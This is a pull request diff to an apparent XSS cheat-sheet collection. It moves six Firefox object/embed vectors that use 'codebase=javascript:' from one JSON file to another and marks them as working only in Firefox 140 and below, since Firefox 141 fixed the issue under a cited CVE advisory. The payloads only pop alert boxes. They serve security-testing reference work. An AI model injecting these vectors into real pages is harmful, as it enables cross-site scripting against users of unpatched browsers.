### PR TITLE
Firefox does not execute javascript: URLs in object/embed anymore

### DIFF
--- a/json/classic.json
+++ b/json/classic.json
@@ -200,5 +200,35 @@
     "description": "Base tag with JavaScript protocol rewriting relative URLS",
     "code": "<base href=\"javascript:/a/-alert(1)///////\"><a href=../lol/safari.html>test</a>",
     "browsers": ["safari"]
+  },
+  {
+    "description": "Object data and codebase in Firefox v140 and below",
+    "code": "<object data=# codebase=javascript:alert(document.domain)//>",
+    "browsers": ["firefox"]
+  },
+  {
+    "description": "Embed src and codebase in Firefox v140 and below",
+    "code": "<embed src=# codebase=javascript:alert(document.domain)//>",
+    "browsers": ["firefox"]
+  },
+  {
+    "description": "Object data and codebase with single line comment in Firefox v140 and below",
+    "code": "<object data=\"#\nalert(1)\" codebase=javascript://>",
+    "browsers": ["firefox"]
+  },
+  {
+    "description": "Object data and codebase and hash bang in Firefox v140 and below",
+    "code": "<object data=\"#!\nalert(1)\" codebase=javascript:>",
+    "browsers": ["firefox"]
+  },
+  {
+    "description": "Embed src and codebase with single line comment in Firefox v140 and below",
+    "code": "<embed src=\"#\nalert(1)\" codebase=javascript://>",
+    "browsers": ["firefox"]
+  },
+  {
+    "description": "Embed src and codebase and hash bang in Firefox v140 and below",
+    "code": "<embed src=\"#!\nalert(1)\" codebase=javascript:>",
+    "browsers": ["firefox"]
   }
 ]

--- a/json/protocols.json
+++ b/json/protocols.json
@@ -138,35 +138,5 @@
     "description": "Navigation navigate method",
     "code": "<script>navigation.navigate('javascript:alert(1)')</script>",
     "browsers": ["chrome"]
-  },
-  {
-    "description": "Object data and codebase",
-    "code": "<object data=# codebase=javascript:alert(document.domain)//>",
-    "browsers": ["firefox"]
-  },
-  {
-    "description": "Embed src and codebase",
-    "code": "<embed src=# codebase=javascript:alert(document.domain)//>",
-    "browsers": ["firefox"]
-  },
-  {
-    "description": "Object data and codebase with single line comment",
-    "code": "<object data=\"#\nalert(1)\" codebase=javascript://>",
-    "browsers": ["firefox"]
-  },
-  {
-    "description": "Object data and codebase and hash bang",
-    "code": "<object data=\"#!\nalert(1)\" codebase=javascript:>",
-    "browsers": ["firefox"]
-  },
-  {
-    "description": "Embed src and codebase with single line comment",
-    "code": "<embed src=\"#\nalert(1)\" codebase=javascript://>",
-    "browsers": ["firefox"]
-  },
-  {
-    "description": "Embed src and codebase and hash bang",
-    "code": "<embed src=\"#!\nalert(1)\" codebase=javascript:>",
-    "browsers": ["firefox"]
   }
 ]


### PR DESCRIPTION
Firefox 141 was just released with this fixed. https://www.mozilla.org/en-US/security/advisories/mfsa2025-56/#CVE-2025-8029